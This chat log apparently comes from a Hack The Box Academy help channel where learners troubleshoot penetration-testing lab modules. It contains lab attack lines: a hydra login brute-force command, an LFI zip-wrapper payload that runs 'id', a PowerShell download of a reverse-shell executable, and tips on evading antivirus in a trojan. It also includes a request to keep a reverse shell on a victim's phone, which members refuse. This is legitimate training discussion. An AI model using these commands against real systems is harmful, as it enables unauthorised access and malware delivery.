that should be the only thing in the resolvers.txt file

#

otherwise it's trying to query a bunch of other name servers

ashen fiber
#

thanks.

cloud urchin
#

did they update that section or something? i used another method entirely

fathom pendant
cloud urchin
#

yeah i do see that on the page but my notes show something else

fathom pendant
#

¯\_(ツ)_/¯

#

i mean subbrute is used to find the subdomain, then dig or another tool is used to actually query it

cloud urchin
#

yeah maybe that's why

#

yeah i think that's it

olive slate
#

Hi. Can anyone gimme a bit of help on Injection Attacks > Exploitation of PDF Generation Vulnerabilities?

#

Actually nevermind. I solved it

fathom pendant
#

let's not spoil the module; not to mention you replied to something 10 days old, i'd hope they got past it by now

empty trout
#

Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer. I scanned all the ports and got 7 open ports, but it is not the correct answer

#

what does the highest port mean

acoustic owl
#

Have you scanned all ports?

empty trout
#

yeah

#

-p-

fathom pendant
#

not the number of ports

#

i.e. ports 2, 3, 22 , 5555, 3000 the highest port is 5555

ashen fiber
fathom pendant
#

or are you asking if you should

#

if you're asking if you should, that's the wrong way to go about it. Do first, ask later if it fails

ashen fiber
civic dawn
#

Hello, I'm at the Broken Authentication module, Brute-Forcing Passwords section.

While running this command:
"grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt"

I'm getting this error:
"grep: rockyou.txt: binary file matches"

shut quest
#

Need an embed for don't ask to bash or something like that.

empty trout
#

thanks

fathom pendant
gusty cloak
#

People recommend to do the final module "blind" without help. Can I spawn the machine in the first question and do the entire module that way? Or how am I supposed to spawn the entire environment?

Attacking enterprise networks module

normal sand
fathom pendant
#

don't stop until you reach domain admin

fathom pendant
#

so you can potentially see if there's a running process that might contain credentials for how it was launched

#

actually it's explained literally in the paragraph just before

gusty cloak
fathom pendant
trail egret
#

my xfreerdp connection is getting dropped when i share my local folder to rdp

fathom pendant
fathom pendant
trail egret
#

xfreerdp /u:username /p:password /v:target_ip /drive:shared_folder,/path/to/local/folder

fathom pendant
#

hm

#

i've never had any issues with accessing a shared folder, and your syntax looks right

#

though usually i'm doing something like cp \\tsclient\share\<path to thing i want to cp> with powershell (copy for CMD)

trail egret
#

Yes, idk what's wrong:
[10:04:19:302] [26175:26176] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[10:04:19:303] [26175:26176] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:04:19:303] [26175:26176] [INFO][com.freerdp.client.common] - Network disconnect!

normal sand
fathom pendant
#

note the ssh/sshd

#

check the article i linked

fathom pendant
normal sand
fathom pendant
#

...because that's the command line

#

what you type into

normal sand
fathom pendant
#

no

#

the shell runs on the cmdline

#

:)

#

because this stuff digs deeper than shell languages

normal sand
fathom pendant
#

no

#

i sent it bc it explains also what pts is (which is in the output btw)

#

and what it all means

normal sand
fathom pendant
#

it means it's used by a pty

#

it's what helps facilitate the communication of sent commands

normal sand
#

I see.

fathom pendant
#

the top answer really does explain it

#

also it's not looking for files like cmdline

#

it's looking specifically at cmdline

#

i can't tell you why they use find /proc instead of just cat

#

but who knows

normal sand
#

I see. Thanks.

gusty cloak
languid kraken
#

How to get to support?

ashen fiber
full wagon
#

Nessus skills assessment: This question doesn't make any sense to me, what exactly are they asking for?: 'What was the target for the authenticated scan?' I have already tried the hostname with small and capital letters, just don't understand the question.

autumn pilot
#

hint - it is not a hostname that is expected

olive slate
#

Is anyone able to give me a nudge on Injection Attacks > Skills Assessment?

pseudo kiln
#

can I ask someone if I completed the windows priv esc assessment II the right way ? I have access to looking at the solution, but I am just interested in confirmation so if I did not do it the right way I can check for other ways.

full wagon
pseudo kiln
fathom pendant
#

Just not the spawn ip

#

Refer to the reading

steady dock
#

Question #1 for Practical Digital Forensics Scenarios
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

I've extracted PID 6744 with vol.py. I used the cmdline module and couldn't fully decode the PowerShell command, and nothing related to PowerSploit shows up when I use yara. What am I doing wrong?

fathom pendant
fathom pendant
#

Look at the broader picture of what the event id is

#

Sorry

#

Brain fried

#

I meant to say look at all the components of the process

#

Look at what it talks to

steady dock
#

nothing shows up on netscan for that pid

fathom pendant
#

It's found through analysis of the pid

#

Basically though once you dump it just ctrl+f for the different tool names from the repository

#

It's not diving deep into the individual find- or invoke-

#

It's very much a top level which tool was used

steady dock
#

so the tool doesn't start with find or invoke?

fathom pendant
#

No

#

It starts with power

#

I'll give you that

steady dock
#

is that really the intended way to solve this question?

fathom pendant
#

Utilizing the dump will give multiple references to it

steady dock
#

is there a quicker way to do this?

fathom pendant
#

But yes the idea is to extensively look for everything

#

Strings is a good tool

steady dock
#

I was looking for that tool on the vm but I couldn't find it

fathom pendant
#

You gotta transfer it over

#

Download the zip to your machine then transfer

steady dock
#

what .zip?

#

nevermind, I just guessed the answer

blissful elm
#

Secure Coding 101: JavaScript has anyone completed this module

fathom pendant
blissful elm
#

if anyone has completed this pls dm me i wanna know something

safe robin
#

anyone here

fathom pendant
#

Nope we all died

safe robin
# fathom pendant Nope we all died

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

#

i completed it with a hint

#

but I wanna know how we know

brittle lotus
#

what module is this from

safe robin
#

that wordpress plugin is used in it?

#

pentesting

brittle lotus
#

you're asking how we know for sure that wordpress is the attack vector?

safe robin
#

I am asking how we know that the WordPress Simple Backup plugin was used. In the scan it told me it's an Apache server and WordPress is used, but the plugin was not mentioned in it, so how do we know that plugin can be the attack vector?

brittle lotus
#

most of us will immediately turn to wpscan since it's a wordpress box

safe robin
#

ohkye

#

actually I did it with Metasploit, maybe that's why I was curious

#

wpscan tells which plugins are being used? But how does that tool fingerprint these plugins?

brittle lotus
#

yes it does check plugins, and i believe it's a combination of crawling and fuzzing

fathom pendant
#

Also wpscan isn't needed if it's the module I'm thinking

#

Just visiting the web page

grand thistle
#

I don't know if I can ask questions here, but for the module Intro to Network Traffic Analysis, section Packet Inception, Dissecting Network Traffic With Wireshark, I was able to get the photo, but how do I get the username? I checked the forum and found the username. I didn't know if there is a better way than just searching the name in Wireshark.

safe robin
full wagon
fathom pendant
safe robin
fathom pendant
#

It's an educated guess

#

All signs pointed to that plugin

safe robin
#

so it's called thinking out of the box then

fathom pendant
#

I mean the box tells you what's in it

#

But generally you're always making an educated guess based on what you see when it comes to hacking

#

You don't know for sure if the exploit will work, but all signs you see point to saying it should work

twilit sentinel
#

I am a newbie. If I have a vhost like freithg.htb and ip:port, what should I write in /etc/hosts? Should I include the port?

fathom pendant
#

You put the ip and vhost

#

And you always specify the port in your requests such as in a browser or with a tool

#

http://vhost.htb:port/

twilit sentinel
#

oh, thanks a lot

fathom pendant
#

The hosts file is a local dns, and dns doesn't use ports

dense eagle
#

Hi can i DM you?

fathom pendant
#

Considering you had to dig 7 months to find the message to reply to

dense eagle
fathom pendant
#

Well he's not obligated to give guidance :p

stiff bone
#

For those who have difficulties in Introduction to Windows Evasion Techniques SA 1: I advise you to review your Trojan. Pay attention to its architecture and the methods you use. I went away from the provided template in the module and wrote my own Trojan, which simplified the logic of the work but encrypted all kernel32 calls, as well as everything else. I also advise you to pay attention to the DLL signatures; be careful, you need 64-bit versions. And I do not advise you to write while tired; take breaks, they really help to reconsider your ideas

fathom pendant
#

You can just ask here (while trying to avoid spoilers) instead of waiting for staff to say y/n to a dm

dense eagle
fathom pendant
#

More recently

#

Was more my point

#

Rather than dig for a message from 7 months ago

dense eagle
fathom pendant
#

Feels like you just dug for the module author instead of looking for similar questions

dense eagle
stoic crown
#

Hello everyone! I am currently doing the "Introduction to Bash Scripting" module and I am stuck on the "Conditional Execution" question, where I need to print the number of characters in the 35th iteration of var.

I tried the following script, and the result is wrong. I am also aware at this point that wc -c adds an extra character at the end to the count. But even if I take 1 from the final answer it is still wrong for some reason. Can someone please point me in the right direction or correct me?

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
    var=$(echo -n "$var" | base64)

    if [ $counter -eq 35 ]
    then
        echo -n "$var" | wc -c
    fi
done

dense eagle
quaint current
#

Hi,

Section:
Information Gathering - Web Edition
Creepy Crawlies

Question: After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

So I have installed Reconspider.py, and I get some errors in my output:

...
"twisted.internet.error.DNSLookupError: DNS lookup failed: no results for hostname lookup: www.inlanefreight.com.
2024-09-16 06:27:19 [scrapy.core.engine] INFO: Closing spider (finished)
2024-09-16 06:27:19 [scrapy.utils.signal] ERROR: Error caught on signal handler: <function Spider.close at 0x7fd152ef1f80>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.11/site-packages/scrapy/utils/defer.py", line 348, in maybeDeferred_coro
result = f(*args, **kw)
File "/usr/lib/python3/dist-packages/pydispatch/robustapply.py", line 55, in robustApply
return receiver(*arguments, **named)
File "/home/kali/.local/lib/python3.11/site-packages/scrapy/spiders/init.py", line 101, in close
return cast(Union[Deferred, None], closed(reason))
File "/opt/ReconSpider.py", line 102, in closed
with open('results.json', 'w') as f:
PermissionError: [Errno 13] Permission denied: 'results.json'"
...

Any suggestion?

spare stone
#

Hi Everyone
I am doing a gobuster vhost brute force on the target IP. It is working, but there are no results.
Module: info gathering web
Section: Virtual hosts

Can anyone help me?

safe star
#

Looks like you used the ip instead of the domain name

#

Add the domain to your /etc/hosts file, then try again

opal nexus
#

Does anyone else currently experience lag on the HTB Academy website?

wary heath
#

Hey friends, how are you? I made an Android reverse shell using the Metasploit framework. I wanna make this app persistent on the victim's phone. Anybody help me? Please!!

fathom pendant
#

This isn't the channel nor server for that

#

We don't do really any phone hacking here

storm elk
#

As Marcie said, not the place for this. Doesn't sound legal either the way you put it

fathom pendant
#

If you want to figure out persistence use your own phone

tacit bay
#

is academy broken right now?

storm elk
#

Academy seems to be having issues too

#

It seems to be getting better on academy atm

umbral spade
#

it's loading the content, just not the tests at the bottom

storm elk
#

I can load my dashboard again

#

yeah, I had issues clicking Show Solution

tacit bay
#

yeah, even just loading some of the modules isn't working - all the different pathways aren't showing up

opal nexus
fleet pawn
#

Hi guys, I'm doing the Linux Fundamentals module but I have problems doing the first exercise

#

there is a button that says "download VPN connection file" but I don't know what I have to do

#

and under that "start instance" for doing the exercise, but it doesn't work either

fathom pendant
#

The vpn is for doing exercises on your own machine

#

The start instance button should start a vm which is usable in the browser

fleet pawn
#

I click the instance button but it doesn't work

fathom pendant
#

Currently appears some htb services are having issues

#

Probably gonna have to come back to it in a few hours

fleet pawn
#

Target(s): Fetching status... what does it mean?

#

maybe the exercise is connecting to my own machine in the HTB server, because it says this: SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"

#

It's the Linux Fundamentals module. Does someone know if this is correct?

fathom pendant
#

as I just said though, it seems something is going on in htb backend

#

So you may just need to step away for now

fathom pendant
#

It's spawning a target that you'd connect to with those credentials to ssh into

fleet pawn
#

ok, thanks.
Sorry for the inconvenience. I'm new and English is not my native language

fathom pendant
#

I suggest coming back to it in a few hours as there are currently problems going on

#

I suggest as well doing the introduction to academy module

magic lake
#

I can't access any academy module. They are not loading. Every other tab works fine, idk why

uncut ocean
#

Can anyone help me clearing a small doubt regarding Socat Redirection with a Reverse Shell

uncut ocean
#

Cool, so in this scenario I first get a Meterpreter shell on the Ubuntu server, and my aim is getting a reverse shell on the Windows machine, which I can access through Ubuntu. So after getting the shell I use the portfwd command to forward the port and connect to Windows through RDP. Then, when I try to download the .exe reverse shell, I open a Python server on the Ubuntu host, and according to my logic I have to put the IP address of the Ubuntu server in the Invoke-WebRequest command so that it can download the file, but that gives an error; when I put the Windows IP instead, it downloads the file. Why??

#

Invoke-WebRequest -Uri "http://172.16.5.129:8831/backupscript.exe" -OutFile "C:\Users\Public\backupscript.exe"

#

here this 172.x.x.x is the IP of that Windows machine, and through this I can download the file which I host on the Ubuntu server through the Python server

#

but the ip of ubuntu is 10.129.73.35

#

and it's showing an error when I try with this

next bronze
#

you'd need a host that is connected to both networks

#

since you're able to run commands on the windows host, just do the same thing but reversed

oblique jungle
oblique jungle
fathom pendant
#

That's the pwnbox/vpn ip

#

The target ip is from the "Click here to spawn target"

#

"Spawn instance" spawns the in-browser vm (pwnbox)

oblique jungle
fathom pendant
#

Targets will generally be in one of two forms

#

10.129.x.x for those requiring the vpn

#

Or some publicIP:port for ones that don't

oblique jungle
fathom pendant
#

(Introduction to academy module should go over this)

oblique jungle
fathom pendant
#

👍

#

It's not the first nor last time I'll have explained this

oblique jungle
median gale
#

Anyone else having troubles spawning targets?

quiet trout
#

try logging out and logging back in

fathom pendant
#

Did you delete all the hashes from the file and end it with a new-line? Also did you recompile

fathom pendant
#

You'll need to recompile in order to try and connect

median gale
fading perch
fathom pendant
#

You need to recompile the code in order for it to actually do the changes you made

fathom pendant
#

Well if you did it right it should log you in

#

¯\_(ツ)_/¯

#

Did you change the name of the new jar?

fleet pawn
#

hi, I'm trying to install the academy VPN in my Parrot VM but I get "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn"
Does someone know why this is?

bronze heron
limber river
bronze heron
# limber river why are you using the `H=authorization.....`

I get it, it was extra, it's my mistake.
Currently I'm using this command

hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt 94.237.56.198 -s 36774 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^ :S=HTB{" -f

Still not getting any result and I tried more than 10 different wordlists too.

limber river
bronze heron
quiet trout
#

you left out your uh... what's it called, your error trigger. And also your rate limit option

#

i mentioned this to you yesterday

#

@bronze heron ^ check the cheat sheet and model your cmd after that. it looks mostly good

median gale
#

Found the subdomain but not the flag; figured it would be in dig but nothing

quiet trout
median gale
quiet trout
#

link me to the module/section you're doing

median gale
quiet trout
#

ok, this isn't the one I did previously. Did you check for VHOSTs as well?

#

not sure i can be of much help other than suggestions

#

also dig TXT sub.example.com in case it's in the TXT records? I think that's how the cmd goes

#

sounds like you did some digging already though, did you try that?

quiet trout
#

I think he's trying to pull flag data. I don't have the cheat sheet in front of me, but I think that's the error trigger (or w/e it's called); it needs to be revised (or added) with the /exact/ way it's marked up in the source... <-- @bronze heron

#

his previous example, which was closer to the working payload, had it, but the source was not fully correct

limber river
quiet trout
# limber river the best way to do it is to detect based on bad string like `F=....`

yeah, that's what it needs to be. His previous cmd was closer to getting him where he needed to be, all the esoteric friggin triggers in hydra... @bronze heron go back in the section and make note of how they use the cmds to get what they want and model yours after it very closely. Keep your wordlist, as that is likely correct. You may also need to download or unzip rockyou.txt and use the whole one (now or at some point later [maybe...])

#

keep a specific eye out for the error trigger and /specifically/ how they input the source. I'm talking errant apostrophes and semicolons and stuff... syntax

#

your error trigger string needs to match the EXACT source (a substring of it)

bronze heron
quiet trout
#

just like in the explanation

#

I suggested you also try the variation on the http-post-form (http-post-form://) as a sanity check. You don't have an http scheme on your IP in that cmd, that may be causing problems... but yes, that is close. Look at your error string, it's wrong.

#

and I think -t4 needs a space? Might as well put one just to be safe

median gale
quiet trout
#

you should be able to bump it up... double it at least. I think I used -t 64 on that without issues

quiet trout
#

ah, it's an A record... hmm... have you tried a zone transfer?

quiet trout
limber river
#

yeah that could help

median gale
quiet trout
#

then AXFR attempt failing, dig any. If AXFRs weren't discussed in the section, skip that; it's very niche and rarely occurs in modern day, unless you're North Korea

median gale
quiet trout
#

dig any should return all records, if memory serves

limber river
quiet trout
#

not just TXT

limber river
#

and it's better to use @dnsserver

#

so you query this server

quiet trout
limber river
#

could you show us your command @median gale

median gale
#

Thank you though ❤️

limber river
#

nice

quiet trout
#

rock on

limber river
#

it's better to delete this, it may spoil it for others

quiet trout
#

@limber river speaking of @dnsserver, is this pretty reliable even in the case of DNS with delegations (like in AD DS domains), where a subdomain's DNS delegation is relegated to a DNS server in the parent domain?

#

I would imagine the forwarding occurs the same as normal, just curious

#

or other more granular configs than your "typical" DNS

#

whatever the case may be

limber river
#

this snippet from dig manual

quiet trout
#

oh i see

limber river
#

if you don't specify the server using @ it will check the /etc/resolv.conf

quiet trout
#

didn't realize just /how/ important @dnsserver was

limber river
tender nimbus
#

Hey guys, I don't really understand the question^^: After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

limber river
tender nimbus
limber river
#

why ?

#

are you sure your vpn connection is good ?

tender nimbus
#

ow right

#

didn't activate it -_-

limber river
quiet trout
limber river
quiet trout
#

finally it's not me this time 😛. I guess my turn's next.

twilit sentinel
#

Guys, are y'all targets working?

#

In academy

quiet trout
#

working on an LFI module https://academy.hackthebox.com/module/23/section/1493

and a syntax I'm unfamiliar with has been used with ZIP LFIs. This shouldn't spoil, but a string like

http://target.com/index.php?param=zip://archive.jpg%23shell.php&cmd=id is used.

the %23 (# fragment) is used here... I don't understand the specific syntax in the given context... is this gonna be a URL fragment, or something different? I understand what it's doing but not /why/...

nvm, chatgpt gave me a somewhat stomachable answer...

#

maybe I need to look at the zip wrapper? If this is not markup related?

limber river
twilit sentinel
#

yeah, but i am using another server

#

and it worked when i just restarted vpn connection

#

ty

viral lotus
quiet trout
#

if I understand how it works correctly. I checked the PHP wrapper docs and zlib:// docs and didn't really see that mentioned specifically, but that seems to be how it's working

viral lotus
#

it's just URL encoding. Burp Suite will do it for you if you use it, and there are tools online. It's just so it's in a readable format for the computer

quiet trout
#

Yeah, I understand the use of the character, just not why it worked in that context exactly. I think I got a handle on it now though. I've only seen the fragment char used to refer to content sections on web pages, and from what I understood it was only processed client side by the browser, so I was surprised.

dusk pond
#

Yooo
Just thinking about going for the CPTS exam !!

Any study tips ?

quiet trout
#

that being said, I do wonder if the browser is storing the contents of the zip data? As I understood it, # was not processed server side... this has got me curious again

#

or why that would ultimately matter, considering the zip contents are used for an inclusion on the server.

median gale
#

Any nudges? Got the username but no luck against the password with any of the services using hydra

viral lotus
#

has the site just gone down?

pseudo kiln
#

for me yes 502

viral lotus
#

ok not just me then

#

good job I wrote notes lol

lunar dagger
#

for me it says the academy has a 3rd party issue

pseudo kiln
#

it's back now

quiet trout
#

yeah, it's spotty, they're working on it.

#

I'm gonna take a lil break now, come back in a bit, hopefully it's sorted.

unkempt rune
#

is HTBA down?

wanton idol
#

seems that way

lunar dagger
#

I can still work on it but it has that warning there

subtle flicker
# viral lotus

Just got the same xD and was just sending a flag 😭

viral lotus
#

tbf there was a pre-warning above ^ that there have been issues, so it is what it is

languid fjord
#

We are aware of the issues and working on it

#

If anyone's exam is impacted, reach out to customer support and we'll make it right

hollow ibex
loud dagger
#

does anyone else ever have absolutely no idea how to answer a question in academy and have to get the answer from a writeup and think "how the fuck was I supposed to figure that out"

#

is this normal or am I doing something wrong

fathom pendant
#

The module should teach you or give you the tools to be able to figure the answer out

rustic sage
#

Module = command injection

I am URL encoding \n in Burp Suite, but it gives "%5c%6e" instead of %0a.. I used both the decoder and the "right click" one!!!!

fathom pendant
#

It's not counting it as a character

rustic sage